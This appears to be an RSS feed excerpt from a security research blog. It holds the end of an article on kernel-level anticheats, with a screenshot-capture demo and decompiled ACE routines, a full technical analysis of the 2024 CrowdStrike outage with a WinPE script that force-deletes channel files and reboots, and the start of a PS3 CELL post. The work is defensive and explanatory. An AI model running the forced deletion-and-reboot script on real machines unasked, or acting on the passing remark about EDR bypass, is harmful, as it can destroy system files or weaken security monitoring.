<pre><code class="lang-c"><span class="hljs-function">LRESULT CALLBACK <span class="hljs-title">window_proc</span><span class="hljs-params">(HWND hwnd, UINT message, WPARAM wparam, LPARAM lparam)</span> </span>{
    <span class="hljs-keyword">switch</span> (message) {
        <span class="hljs-keyword">case</span> WM_DESTROY:
            PostQuitMessage(<span class="hljs-number">0</span>);
            <span class="hljs-keyword">return</span> <span class="hljs-number">0</span>;
        <span class="hljs-keyword">case</span> WM_ACTIVATE:
            <span class="hljs-keyword">if</span> (wparam == WA_INACTIVE) {
                ShowWindow(hwnd, SW_MINIMIZE);
                <span class="hljs-keyword">return</span> <span class="hljs-number">0</span>;
            }
            <span class="hljs-keyword">break</span>;
        <span class="hljs-keyword">case</span> WM_KEYDOWN:
            <span class="hljs-keyword">switch</span> (wparam) {
                <span class="hljs-keyword">case</span> VK_TAB:
                    <span class="hljs-keyword">if</span> ((GetKeyState(VK_MENU) &amp; <span class="hljs-number">0x1</span>) != <span class="hljs-number">0</span>)
                        ShowWindow(hwnd, SW_MINIMIZE);
                    <span class="hljs-keyword">return</span> <span class="hljs-number">0</span>;
                <span class="hljs-keyword">case</span> VK_LWIN:
                <span class="hljs-keyword">case</span> VK_RWIN:
                    ShowWindow(hwnd, SW_MINIMIZE);
                    <span class="hljs-keyword">return</span> <span class="hljs-number">0</span>;
                <span class="hljs-keyword">case</span> VK_ESCAPE:
                    PostQuitMessage(<span class="hljs-number">0</span>);
                    <span class="hljs-keyword">return</span> <span class="hljs-number">0</span>;
                <span class="hljs-keyword">default</span>: <span class="hljs-keyword">break</span>;
            }
            <span class="hljs-keyword">break</span>;
        <span class="hljs-keyword">default</span>: <span class="hljs-keyword">break</span>;
    }
    <span class="hljs-keyword">return</span> DefWindowProc(hwnd, message, wparam, lparam);
}
</code></pre>
<p>The main functionality of continuously capturing screenshots is managed by the <code>capture_gamers</code> function, which runs in an infinite loop on a separate thread. This function checks if the user has pressed the F1 key to toggle between capturing the specified window (if any) and capturing the entire screen. The function increments a counter to generate unique file names for each screenshot and calls <code>capture_screenshot</code> to perform the capture and saving process. The loop includes a delay (using <code>Sleep(1000)</code>) to capture screenshots at one-second intervals.</p>
<pre><code class="lang-c"><span class="hljs-function"><span class="hljs-keyword">void</span> <span class="hljs-title">capture_gamers</span><span class="hljs-params">()</span> </span>{
    HWND backup_hwnd = main_window;

    <span class="hljs-keyword">for</span> (<span class="hljs-keyword">auto</span> n = <span class="hljs-number">0</span>;; n++) {
        <span class="hljs-keyword">if</span> (GetAsyncKeyState(VK_F1) &amp; <span class="hljs-number">0x1</span>) {
            <span class="hljs-keyword">if</span> (main_window)
                main_window = <span class="hljs-literal">nullptr</span>;
            <span class="hljs-keyword">else</span>
                main_window = backup_hwnd;
        }

        <span class="hljs-built_in">std</span>::<span class="hljs-built_in">wstring</span> filename = <span class="hljs-string">L"ss_"</span> + <span class="hljs-built_in">std</span>::to_wstring(n) + <span class="hljs-string">L".png"</span>;
        capture_screenshot(filename, main_window);
        Sleep(<span class="hljs-number">1000</span>);
    }
}
</code></pre>
<p>The main entry point of the application, <code>WinMain</code>, sets up and registers a window class and creates a window. It then shows and updates the window, and starts the screenshot capture thread by creating a new thread running the <code>capture_gamers</code> function. The application enters a message loop to handle messages sent to the window, ensuring it remains responsive.</p>
<pre><code class="lang-c"><span class="hljs-function"><span class="hljs-keyword">int</span> WINAPI <span class="hljs-title">WinMain</span><span class="hljs-params">(HINSTANCE instance, HINSTANCE prev_instance, LPSTR cmd_line, <span class="hljs-keyword">int</span> cmd_show)</span> </span>{
    WNDCLASSEX wcex;
    wcex.cbSize = <span class="hljs-keyword">sizeof</span>(WNDCLASSEX);
    wcex.style = CS_HREDRAW | CS_VREDRAW;
    wcex.lpfnWndProc = window_proc;
    wcex.cbClsExtra = <span class="hljs-number">0</span>;
    wcex.cbWndExtra = <span class="hljs-number">0</span>;
    wcex.hInstance = instance;
    wcex.hIcon = LoadIcon(<span class="hljs-literal">NULL</span>, IDI_APPLICATION);
    wcex.hCursor = LoadCursor(<span class="hljs-literal">NULL</span>, IDC_ARROW);
    wcex.hbrBackground = HBRUSH(COLOR_WINDOW + <span class="hljs-number">1</span>);
    wcex.lpszMenuName = <span class="hljs-literal">NULL</span>;
    wcex.lpszClassName = <span class="hljs-string">L"OhNoScreenshots"</span>;
    wcex.hIconSm = LoadIcon(<span class="hljs-literal">NULL</span>, IDI_APPLICATION);
    RegisterClassEx(&amp;wcex);

    main_window = CreateWindowEx(
        <span class="hljs-number">0</span>,
        <span class="hljs-string">L"OhNoScreenshots"</span>,
        <span class="hljs-string">L"FairFight Never Did This! /s"</span>,
        WS_POPUP | WS_VISIBLE,
        <span class="hljs-number">0</span>, <span class="hljs-number">0</span>,
        GetSystemMetrics(SM_CXSCREEN),
        GetSystemMetrics(SM_CYSCREEN),
        <span class="hljs-literal">nullptr</span>, <span class="hljs-literal">nullptr</span>,
        instance, <span class="hljs-literal">nullptr</span>);

    ShowWindow(main_window, cmd_show);
    UpdateWindow(main_window);

    CreateThread(<span class="hljs-literal">nullptr</span>, <span class="hljs-number">0</span>, <span class="hljs-keyword">reinterpret_cast</span>&lt;LPTHREAD_START_ROUTINE&gt;(capture_gamers), <span class="hljs-literal">nullptr</span>, <span class="hljs-number">0</span>, <span class="hljs-literal">nullptr</span>);

    MSG msg;
    <span class="hljs-keyword">while</span> (GetMessage(&amp;msg, <span class="hljs-literal">nullptr</span>, <span class="hljs-number">0</span>, <span class="hljs-number">0</span>)) {
        TranslateMessage(&amp;msg);
        DispatchMessage(&amp;msg);
    }

    <span class="hljs-keyword">return</span> <span class="hljs-keyword">int</span>(msg.wParam);
}
</code></pre>
<p>If the game window is valid (i.e., the <code>hwnd</code> is not null), the application captures only the active window, which is typically the game window. This ensures the anti-cheat mechanism monitors only the game environment. If the user switches away from the game using Alt+Tab, the capture window becomes inactive, and the application stops capturing to avoid recording irrelevant content. If the <code>hwnd</code> is null, the application captures the entire screen, which is not a normal behavior under typical operations but serves as a fallback to ensure continuous monitoring even if the specific window handle becomes invalid.</p>
<p>But there are some other anticheats that use other more aggressive methods, such as <a target="_blank" href="https://x.com/koyzdev">@koyzdev</a>'s finding about how ACE (Anti Cheat Expert) works. ACE itself is used in the game Arena Breakout : Infinite made by Morefun Studio which is a direct subsidiary of Tencent Games.</p>
<p>The particular issue comes from ACE's user-mode component, ACE-Safe.dll, for its screenshot-taking capabilities. The function in ACE-Safe.dll begins by checking the Windows version with the line.</p>
<pre><code class="lang-c"><span class="hljs-keyword">if</span> (GetVersion() &gt;= <span class="hljs-number">0x80000000</span> || (result = check_window_station(), result &lt;= <span class="hljs-number">0</span>))
</code></pre>
<p>This code determines if the operating system is Windows NT, 2000, or XP. If the current system does not meet these criteria, it checks the Window Station name. If the Window Station name does not contain "Service-0x", the function proceeds. This is a preliminary check to ensure compatibility and execution context. Next, the function creates a device context for the primary display.</p>
<pre><code class="lang-c">hdcSrc = CreateDCW(<span class="hljs-string">L"DISPLAY"</span>, <span class="hljs-number">0</span>, <span class="hljs-number">0</span>, <span class="hljs-number">0</span>);
CompatDC = CreateCompatibleDC(hdcSrc);
</code></pre>
<p><code>CreateDCW</code> creates a device context handle for the display, while <code>CreateCompatibleDC</code> creates a compatible memory device context. These device contexts are essential for capturing the screen content. Interestingly, the function lacks thorough error checking, which might lead to unexpected behavior in certain scenarios. The function then retrieves the display's horizontal and vertical resolutions.</p>
<pre><code class="lang-c">HorizontalRes = GetDeviceCaps(hdcSrc, HORZRES);
VerticalRes = GetDeviceCaps(hdcSrc, VERTRES);
</code></pre>
<p>These values are used to determine the dimensions of the screenshot. Subsequently, a compatible bitmap is created with these dimensions, although the height is fixed at 16 pixels. The use of a height of 16 pixels is unusual and indicates that the screenshot will be captured in segments rather than as a whole.</p>
<pre><code class="lang-c">CompatibleBitmap = CreateCompatibleBitmap(hdcSrc, HorizontalRes, <span class="hljs-number">16</span>);
v8 = VerticalRes - <span class="hljs-number">16</span>;
<span class="hljs-keyword">for</span> (y1 = <span class="hljs-number">0</span>; y1 &lt; v8; y1 += <span class="hljs-number">16</span>)
</code></pre>
<p>Here, <code>v8</code> is the vertical resolution minus 16, and a loop iterates over the screen height in 16-pixel increments. This method is reminiscent of old CRT raster scanning, capturing the entire screen width but only 16 pixels in height per iteration. This segmentation could potentially be used for low FPS streaming as well.</p>
<p>The actual screenshot capture occurs with the <code>BitBlt</code> function. <code>BitBlt</code> transfers pixel data from the source device context to the compatible memory device context, capturing a 16-pixel high segment of the screen.</p>
<pre><code class="lang-c">BitBlt(CompatDC, <span class="hljs-number">0</span>, <span class="hljs-number">0</span>, HorizontalRes, <span class="hljs-number">16</span>, hdcSrc, <span class="hljs-number">0</span>, y1, <span class="hljs-number">0xCC0020</span>);
GetBitmapBits(CompatibleBitmap, v6, v7);
</code></pre>
<p><code>GetBitmapBits</code> then retrieves the bitmap's bits, storing them in <code>v7</code>. This raw pixel data is processed further, although the exact processing steps involve obfuscated functions likely related to OpenSSL for encryption, as hinted by the sub-functions like <code>sub_180002D80</code>. After capturing and processing the screenshot, the function cleans up the resources.</p>
<pre><code class="lang-c">v11 = SelectObject(CompatDC, v5);
DeleteObject(v11);
DeleteDC(CompatDC);
<span class="hljs-keyword">return</span> DeleteDC(DCW);
</code></pre>
<p>The cleanup ensures that device contexts and objects are properly released, preventing resource leaks.</p>
<p>All of this suggests that ACE has the capability to capture and potentially transmit comprehensive screenshots, including sensitive information unrelated to the game. This functionality could be triggered under specific conditions, such as when cheating is detected or reported, which is way more aggressive than what Vanguard does.</p>
<h1 id="heading-conclusions">Conclusions</h1>
<p>This is definitely a non-exhaustive list of techniques being used, i have definitely glossed over alot of other protection methods like <a target="_blank" href="https://reversing.info/posts/guardedregions/">Vanguard's guarded memory regions</a> which are too complex for a simple subsection to explain. But this should provide you guys with a generic overview on how most of these systems work.</p>
<p>To be fully honest, even though i do not trust Riot Games (partly owned by Tencent, a Chinese entity) or MiHoYo (owned by MiHoYo, a Chinese entity) if they were to do something such as stealing personal user information it would've probably already been found out by now due to the amount of people trying to crack apart mhyprot and Vanguard. The same applies to other cheat systems like BattlEye, EAC, VAC, etc.</p>
<p>Are the fear for kernel level anticheats overblown? Perhaps, but one must consider that from all of the techniques we discussed above, kernel-level anticheats have the capability to :</p>
<ul>
<li><p>Have nearly limitless access to your device and data, including connected devices and data in-memory</p>
</li>
<li><p>Conduct aggressive integrity checks can lead to false positives, causing legitimate processes to crash or behave unpredictably</p>
</li>
<li><p>Harms attempts to play games in alternative platforms such as in Linux through Proton/Wine</p>
</li>
<li><p>Interfere with the operation of legitimate security software that relies on accessing certain core Windows systems, potentially reducing the effectiveness of these tools</p>
</li>
</ul>
<p>Anticheats also get away with hooking things that usually will trigger EDR alerts, which give some interesting EDR bypass capabilities.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1719144129494/8e8568b6-8542-4100-b131-8f1b9214dfe9.png" alt class="image--center mx-auto" /></p>
<p>For me personally, these are not tradeoffs that i'm willing to give in order to play games on the internet. I've also blacklisted common anticheat processes and binaries in major EDR platforms.</p>
<p>But i've never been fond of competitive or gacha games anyways, with me usually enjoying more singleplayer-oriented games. However, the tolerance and preferences of other people might be different, and i do think kernel-level anticheats are important to ensure fair play inside competitive games that even have <a target="_blank" href="https://www.dexerto.com/valorant/valorant-champions-2023-to-offer-record-prize-pool-2228107/">professional leagues with million dollar prize pools</a> or <a target="_blank" href="https://www.pcgamesn.com/genshin-impact/whale-account">have accounts that can sell up to six figures</a>.</p>
<p>This article was only meant as introducing people to the concept of kernel-level anticheats, which are sometimes surrounded with mystery due to their sensitive nature and the heavy amount of obfuscation that developers put into these systems. Most of you guys probably already made up your mind about this issue, and if you haven't i hope this article helped you form an informed opinion.</p>
]]></content:encoded></item><item><title><![CDATA[Quick Analysis About the Crowdstrike Situation]]></title><description><![CDATA[Cover Illustration by ireneparamithaa

DISCLAIMER : This research was done using software obtained by myself individually, analyzed using hardware owned by myself individually. Some code may be simplified and edited to provide clarity or to maintain ...]]></description><link>https://research.meekolab.com/quick-analysis-about-the-crowdstrike-situation</link><guid isPermaLink="true">https://research.meekolab.com/quick-analysis-about-the-crowdstrike-situation</guid><dc:creator><![CDATA[meekochii]]></dc:creator><pubDate>Sun, 21 Jul 2024 09:51:48 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1721500257188/daf25d42-7e16-44e8-bdb9-e2c274eb6326.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<blockquote>
<p><strong><em>Cover Illustration by ireneparamithaa</em></strong></p>
<hr />
<p><strong><em>DISCLAIMER : This research was done using software obtained by myself individually, analyzed using hardware owned by myself individually. Some code may be simplified and edited to provide clarity or to maintain confidentiality.</em></strong></p>
</blockquote>
<p>On Friday, July 19th 2024, a faulty update pushed by Crowdstrike to its Falcon EDR caused machines globally to bluescreen and also to be stuck in an infinite bootloop. This <a target="_blank" href="https://www.reuters.com/technology/cybersecurity/crowdstrike-update-that-caused-global-outage-likely-skipped-checks-experts-say-2024-07-20/">has caused havoc globally</a>, with <a target="_blank" href="https://blogs.microsoft.com/blog/2024/07/20/helping-our-customers-through-the-crowdstrike-outage/">Microsoft saying</a> that globally around 8.5 million endpoints are affected globally.</p>
<p>So instead of relaxing like a normal person on a weekend, i decided to take a look (because i wanted twitter clout). One of the questions is what caused the BSOD and bootloop situation, and why did removing a <code>.sys</code> file help with the situation?</p>
<p>This article would not be possible without :</p>
<ul>
<li><p>Patrick Wardle which provided the kernel driver for Crowdstrike and the offending channel files</p>
</li>
<li><p>Tavis Ormand for initial analysis</p>
</li>
<li><p>Aliz Hammond and Kyle Avery for final checking and editing because i wrote this half asleep</p>
</li>
</ul>
<h1 id="heading-analysis">Analysis</h1>
<h3 id="heading-checking-the-crash-logs-and-official-workaround">Checking the Crash Logs and Official Workaround</h3>
<blockquote>
<p>DISCLAIMER : Some screenshots and crash logs were edited for confidentiality purposes</p>
</blockquote>
<p>Checking the crash logs for the csagent.sys driver revealed some interesting clues.</p>
<pre><code class="lang-c">EXCEPTION_RECORD: fffffb0d18d3ec28 -- (.exr <span class="hljs-number">0xfffffb0d18d3ec28</span>)
ExceptionAddress: fffff80d21df335a1 (csagent+<span class="hljs-number">0x0000000000035a1</span>)
ExceptionCode: c0000005 (Access violation)
ExceptionFlags: <span class="hljs-number">00000000</span>
NumberParameters: <span class="hljs-number">2</span>
    Parameter[<span class="hljs-number">0</span>]: <span class="hljs-number">0000000000000000</span>
    Parameter[<span class="hljs-number">1</span>]: <span class="hljs-number">000000000000009</span>c
Attempt to read from address <span class="hljs-number">000000000000009</span>c

CONTEXT: fffffb0d18d3e460 -- (.cxr <span class="hljs-number">0xfffffb0d18d3e460</span>)
rax=ffffffb0d18d43f0 rbx=<span class="hljs-number">0000000000000240</span> rcx=<span class="hljs-number">0000000000000234</span>
rdx=ffffffb0d18d5430 rsi=ffffff9a815b7835 rdi=ffffff9a815b7925
rip=ffff80d21df335a1 rsp=ffffffb0d18d3ef40 rbp=ffffffb0d18d3f50
 r8=<span class="hljs-number">000000000000009</span>c  r9=ffffffb0d18d3e75 r10=ffffffb0d18d4f2c
r11=ffffffb0d18d4124 r12=ffffffb0d18d4128 r13=ffffffb0d18d41d0
r14=<span class="hljs-number">0000000000000030</span> r15=<span class="hljs-number">0000000000000120</span>
iopl=<span class="hljs-number">0</span>         nv up ei pl nz na po nc
cs=<span class="hljs-number">0010</span> ss=<span class="hljs-number">0018</span> ds=<span class="hljs-number">002b</span> es=<span class="hljs-number">002b</span> fs=<span class="hljs-number">0053</span> gs=<span class="hljs-number">002b</span>             efl=<span class="hljs-number">00050206</span>
csagent+<span class="hljs-number">0x35a1</span>:
fffff80d21df335a1 <span class="hljs-number">458b</span>08          mov     r9d,dword ptr [r8] ds:<span class="hljs-number">002b</span>:<span class="hljs-number">00000000</span>`<span class="hljs-number">0000009</span>c=???????? 

Resetting <span class="hljs-keyword">default</span> scope
</code></pre>
<p>An examination of the context record reveals the state of the CPU registers at the time of the exception. The instruction pointer (RIP) was at <code>fffff80d21df335a1</code>, and it attempted to execute the instruction <code>mov r9d, dword ptr [r8]</code>. This instruction tried to move data from the memory address pointed to by <code>r8</code> into the <code>r9d</code> register. However, the address in <code>r8</code> was <code>000000000000009c</code>, which is invalid and resulted in the access violation.</p>
<p><a target="_blank" href="https://www.crowdstrike.com/falcon-content-update-remediation-and-guidance-hub/">Crowdstrike's official workaround post</a> also provided some interesting clues.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1721478411684/86fe7b5c-a60d-4fa7-9703-1f4112fe0993.png" alt class="image--center mx-auto" /></p>
<p>The instructions advised users to boot into safe mode and locating a file called <code>C-00000291*.sys</code> in the Crowdstrike's driver directory and deleting it, which is interesting. This is where Crowdstrike's kernel-mode drivers are stored, which we have talked in length about the risks of kernel mode drivers, both <a target="_blank" href="https://research.meekolab.com/recreating-the-ramp-forum-edr-bypass">in EDRs</a> and in <a target="_blank" href="https://research.meekolab.com/analyzing-genshin-impacts-anticheat-module">anticheat programs</a>. But in the folder itself there are tons of <code>.sys</code> files, which begs the question why does Crowdstrike need so many kernel-mode drivers?</p>
<p>A later <a target="_blank" href="https://www.crowdstrike.com/blog/technical-details-on-todays-outage/">technical writeup published by Crowdstrike</a> detailed how these files, despite their <code>.sys</code> extensions, these files are actually whats called <a target="_blank" href="https://supportportal.crowdstrike.com/s/article/ka16T000000wuddQAA">Channel Files</a> which contains behavioral detection signatures for the EDR platform.</p>
<h3 id="heading-checking-the-channel-files-and-kernel-driver">Checking the Channel Files and Kernel Driver</h3>
<p>The aforementioned technical writeup stated that the problematic Channel File (<code>C-00000291-*</code> with a <code>.sys</code> extension) controlled how Crowdstrike evaluates named pipes in Windows, which at the time was being updated to account for a new named pipe technique being leveraged by common C2 frameworks. However, the post didn't get into much detail into what it was actually trying to detect.</p>
<p>However, the timing highly coincided with the release of <a target="_blank" href="https://www.cobaltstrike.com/blog/cobalt-strike-410-through-the-beacongate">Cobaltstrike's new Aggressor Function</a>, which can send arbitrary data to a custom post-exploitation job via a named pipe, providing significant flexibility in how post-ex tasks are executed.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1721479433026/7d21f071-f97b-4106-b90a-5ffd64606131.png" alt class="image--center mx-auto" /></p>
<p>This function empowers operators to send specific data strings to custom post-explotiation jobs, which can be used to build dynamic and context-specific execution of post-ex tasks, such as adaptive data exfiltration or automated response triggers. The general consesus is that <code>C-00000291-00000000-00000032.sys</code> is the offending channel file for this issue.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1721480229519/67b48d89-6cce-4463-9abf-201c66d0c4bc.png" alt="(Fig 1) Screenshot floating around on Twitter" class="image--center mx-auto" /></p>
<p>There was an early tweet with this screenshot that says this file is full of zeroes, which would've implied that Crowdstrike pushed a signature file filled with null values. But as far as im concerned this is definitely not the case for the many samples i've gathered so far. The files do appear to be obfuscated, probably to stop competitors reading their channel files and figuring out their heuristic detection models.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1721480380782/4af523e2-b0bf-4ae2-9079-8043dbe83d4f.png" alt class="image--center mx-auto" /></p>
<p>Inside Crowdstrike's driver we can read further how the driver interacts with the channel files.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1721500342377/0aa7b321-d041-42cd-93d5-f0a0c02e299b.png" alt class="image--center mx-auto" /></p>
<p>The searches for a filename using the format string <code>C-%08u-%08u-%08u.sys</code> and then loads this into <code>rdx</code>. Its not possible to know for sure what logic error happened inside the channel file that caused the condition due to the file being obfuscated, but probably an invalid signature data triggered a fault in the kernel-mode driver.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1721500331762/54883851-d11d-4034-b983-0f3e89c7dae9.png" alt class="image--center mx-auto" /></p>
<p>The driver tried to access the 0x14 pointer in a buffer (<code>mov r8, [rax+r11*8]</code>). It sets up <code>rax</code> as the base address and calculates the offset. It seems like the code included checks to ensure that <code>r8</code> is not null before attempting to read from it. <code>test r8, r8</code> checks if <code>r8</code> is non-zero, and if <code>r8</code> is not zero, it jumps to <code>loc_1400E14F4</code>.</p>
<p>The problem lies where the initial null check only ensures that <code>r8</code> is not zero, but it doesn't verify whether <code>r8</code> points to a valid and accessible memory address. Because of this, the address passes and continues on to the next instruction.</p>
<p>The instruction <code>movzx r9d, word ptr [r8]</code> reads a word value from the address pointed to by <code>r8</code>, an invalid address in <code>r8</code> would cause a crash when this read is attempted.</p>
<h3 id="heading-why-the-bootloop">Why the bootloop?</h3>
<p>But usually even third-party kernel mode drivers are loaded, they usually are loaded after the system has completed the boot process. But it seems that the crashes affect machines before even they get into the OS, so whats actually happening?</p>
<p>As part of the Microsoft Virus Initiative (MVI), Crowdstrike has special privileges through Windows's Early Launch Anti-Malware (ELAM) feature. ELAM allows security vendors to build kernel-mode drivers that loads early during bootup and before third-party drivers initialize. This can enable detection of malicious third-party kernel mode drivers and rootkits.</p>
<p>When the driver reads the new channel files, it caused an invalid memory access which caused a bluescreen. Then subsequently during the device restart, the driver reloads the channel file and causes another BSOD during boot which puts the system into Recovery Mode and causing the bootloop.</p>
<p>There are strict requirements to build ELAM drivers, which requires a vendor to have their drivers to pass <a target="_blank" href="https://learn.microsoft.com/en-us/windows-hardware/drivers/install/elam-driver-requirements">certain requirements</a> from Microsoft through testing and certification. But since these channel files weren't considered part of the driver, they didn't need to be signed of by Microsoft.</p>
<h1 id="heading-solution">Solution</h1>
<blockquote>
<p>EDIT : Microsoft has released a dedicated tool for this exact purpose, check out <a target="_blank" href="https://techcommunity.microsoft.com/t5/intune-customer-success/new-recovery-tool-to-help-with-crowdstrike-issue-impacting/ba-p/4196959">here</a></p>
</blockquote>
<p>There isn't a magic bullet solution to this really, since the driver loads before other third-party drivers like MDMs, its not like you can push out a GPO policy or a command via an MDM to remove these drivers. Likely you'd have to go to the machines one by one physically and boot into safemode to delete the faulty channel files manually.</p>
<p>You can use something like the Windows Preinstallation Environment (WinPE) to significantly speed-up the procedure, which makes this much easier to do at scale. This will create a bootable USB using the created WinPE media with a script will automatically run, delete the problematic CrowdStrike files, and reboot the system.</p>
<h3 id="heading-prerequisites">Prerequisites</h3>
<ol>
<li><p>Windows Assessment and Deployment Kit (ADK) for Windows 10 or later</p>
</li>
<li><p>Windows PE add-on for the ADK</p>
</li>
<li><p>Administrative privileges on a Windows 10 or later system</p>
</li>
</ol>
<h3 id="heading-steps">Steps</h3>
<ol>
<li><p><strong>Install Windows ADK and Windows PE add-on</strong> Download and install both from the Microsoft website.</p>
</li>
<li><p><strong>Create a working copy of Windows PE files</strong> Open Command Prompt as Administrator and run:</p>
<pre><code class="lang-c"> copype amd64 C:\WinPE_amd64
</code></pre>
</li>
<li><p><strong>Mount the Windows PE image</strong></p>
<pre><code class="lang-c"> Dism /Mount-Image /ImageFile:<span class="hljs-string">"C:\WinPE_amd64\media\sources\boot.wim"</span> /Index:<span class="hljs-number">1</span> /MountDir:<span class="hljs-string">"C:\WinPE_amd64\mount"</span>
</code></pre>
</li>
<li><p><strong>Create a startup script</strong> Create a file named <code>startnet.cmd</code> in <code>C:\WinPE_amd64\mount\Windows\System32</code> with the following content:</p>
<pre><code class="lang-c"> wpeinit
 powershell -Command <span class="hljs-string">"Remove-Item -Path '$env:SystemDrive\Windows\System32\drivers\CrowdStrike\C-00000291*.sys' -Force"</span>
 shutdown /f /r /t <span class="hljs-number">0</span>
</code></pre>
</li>
<li><p><strong>Modify the Windows PE configuration</strong> Edit <code>C:\WinPE_amd64\mount\Windows\System32\winpeshl.ini</code>:</p>
<pre><code class="lang-c"> [LaunchApps]
 %SYSTEMROOT%\System32\startnet.cmd
</code></pre>
</li>
<li><p><strong>Add PowerShell support to WinPE</strong></p>
<pre><code class="lang-c"> Dism /Add-Package /Image:<span class="hljs-string">"C:\WinPE_amd64\mount"</span> /PackagePath:<span class="hljs-string">"C:\Program Files (x86)\Windows Kits\10\Assessment and Deployment Kit\Windows Preinstallation Environment\amd64\WinPE_OCs\WinPE-PowerShell.cab"</span>
</code></pre>
</li>
<li><p><strong>Unmount and commit changes</strong></p>
<pre><code class="lang-c"> Dism /Unmount-Image /MountDir:<span class="hljs-string">"C:\WinPE_amd64\mount"</span> /Commit
</code></pre>
</li>
<li><p><strong>Create bootable media</strong></p>
<pre><code class="lang-c"> MakeWinPEMedia /UFD C:\WinPE_amd64 E:
</code></pre>
<p> *Replace E: with your USB drive letter</p>
</li>
</ol>
<p>For devices with BitLocker, there are some workarounds to <a target="_blank" href="https://www.crowdstrike.com/falcon-content-update-remediation-and-guidance-hub/#:~:text=a%20recovery%20key.-,How%20do%20I%20Recover%20Bitlocker%20Keys%3F,-Updated%202024%2D07">retrieve the BitLocker key</a> using various methods.</p>
<h1 id="heading-conclusion">Conclusion</h1>
<p>Who is to blame? Probably Crowdstrike.</p>
<p>But building kernel drivers are hard, and they are harder to QA test for. This isn't to excuse Crowdstrike, who basically made a kernel driver that loads hotpatches from userland. Because of the nature ELAM certification proces and lapses in QA practices at Crowdstrike, this possibly passed alot of eyes and was deployed haphazardly to production.</p>
<p>I've talked previously in my post about <a target="_blank" href="https://research.meekolab.com/internals-of-macos-endpoint-security-products#heading-limitations-of-kext-based-security-products">EndpointSecurity in MacOS</a> about how building kernel mode drivers has tremendous risks to security and OS stability. While in recent days there have been more discussions surrounding <code>EndpointSecurity</code>, how it might be too restrictive, i still maintain that this is a good solution to avoid these types of disasters.</p>
<p>Many argue that creating usermode telemetry pipelines creates a single point of failure, but this is currently no different to the approaches used by vendors today like kernel callbacks and ETW-TI.</p>
<p>Microsoft tried to introduced security boundaries like this with the introduction of <a target="_blank" href="https://research.meekolab.com/bypassing-kernel-patch-protections-on-windows">Kernel Patch Protection (KPP)</a>, but was met with <a target="_blank" href="https://web.archive.org/web/20070217053224/http://www.windows-now.com/blogs/robert/archive/2006/08/12/PatchGuard-and-Symantecs-Complaints-About-Windows-Vista.aspx">stiff opposition from cybersecurity vendors</a>. The European Commission also targeted Microsoft with an antitrust investigation due to its inclusion of KPP.</p>
<p><a target="_blank" href="https://web.archive.org/web/20070202190644/http://software.silicon.com/os/0,39024651,39163525,00.htm">To quote</a> :</p>
<blockquote>
<p>"The second Vista security area causing the EC concern was PatchGuard, or kernel patch protection, the code that prevents access to the Vista kernel. Security vendors McAfee and Symantec were <strong>incensed</strong> they were banned from the kernel. The EC wanted Microsoft to disable this feature but Microsoft refused."</p>
</blockquote>
<p>The issue was purely because when PatchGuard was introduced, Microsoft didn't really provide a userland telemetry equivalent for security vendors. I think the goal shouldn't be to remove all third-party code from the kernel, but atleast to give more usermode telemetry so these types of operations are not as necessary as before.</p>
<p>Are people gonna move out of Crowdstrike for this? Probably. Management types, especially non-technical ones, are inpatient and think they can buy themselves out of any problem. They think EDRs are magic black boxes that can stop breaches, but many forget that Crowdstrike is market leading not because their software has some secret sauce (they don't, all EDRs are basically the same product skinned with a different UI) but the human capital behind it from its reasearch and managed defense teams.</p>
<p>But alas, one can dream.</p>
]]></content:encoded></item><item><title><![CDATA[Exploring the Power of Parallelized CPU Architectures]]></title><description><![CDATA[Cover Illustration by hi__dan

In a recent trip from Japan, i came to score a rare PS3 reference tool (DECR-1000J) which was sold below market rates. As these things are apparently very rare and are not regionlocked unlike the retail models, i took t...]]></description><link>https://research.meekolab.com/exploring-the-power-of-parallelized-cpu-architectures</link><guid isPermaLink="true">https://research.meekolab.com/exploring-the-power-of-parallelized-cpu-architectures</guid><dc:creator><![CDATA[meekochii]]></dc:creator><pubDate>Thu, 30 May 2024 17:00:00 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1718425768409/3b826e17-6ba2-43fc-a988-e680e8166347.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<blockquote>
<p><strong><em>Cover Illustration by hi__dan</em></strong></p>
</blockquote>
<p>In a recent trip from Japan, i came to score a rare PS3 reference tool (<a target="_blank" href="https://www.psdevwiki.com/ps3/DECR-1000J">DECR-1000J</a>) which was sold below market rates. As these things are apparently very rare and are not regionlocked unlike the retail models, i took the chance to buy it in order to serve as a learning platform. But unfortunately i lost the unit during a home invasion incident while i was out of the country during the weekend, alongside several valuables and my work laptop. I'm not exactly sure what they were planning to do with a rackmountable PS3, but alas i was not destined to play around with it for long.</p>
<p>I've always see the architecture of the PS3, the CELL Broadband Engine, as some sort of mythical creature. After looking online for tutorials on how to <a target="_blank" href="https://www.psx-place.com/threads/ps3-decr-1000a-3-15-deh-mfw-unlocked-hidden-option-to-boot-linux-in-3-15.9490/">install Linux</a> on it, i got to work on figuring out what i can possibly use this for, or what can i write about it that hasn't been endlessly written before. Thats when i got the idea to remark a math library to the CELL SPU, utilizing its SIMD and ILP features to speed up the process.</p>
<p>Funnily enough, recently a startup called <a target="_blank" href="https://flow-computing.com/technology/">Flow Computing</a> that has some graphs (and names) suspiciously similar to how the CELL BE architecture work. The startup claims that their new "CPU 2.0" architecture is able to accelerate CPU workloads up to 100x, which is (sorta) believable knowing that they're not some scrappy shady startup but a spinout of VTT Technical Research Center from Finland.</p>
<p>This article (probably closer to an academic paper at this point) would not be possible without :</p>
<ul>
<li><p>Francesco Mazzoli on <a target="_blank" href="https://mazzo.li/posts/vectorized-atan2.html">speeding atan2f by 50x</a> through AVX-512 instructions which serves as the initial inspiration for this article</p>
</li>
<li><p>Mike Acton from B3D@CellPerformance for the <a target="_blank" href="https://web.archive.org/web/20240229184719/https://cellperformance.beyond3d.com/articles/2006/09/atan2-on-spu.html">sequential implementation of atan2</a> in the CELL SPU (archive link)</p>
</li>
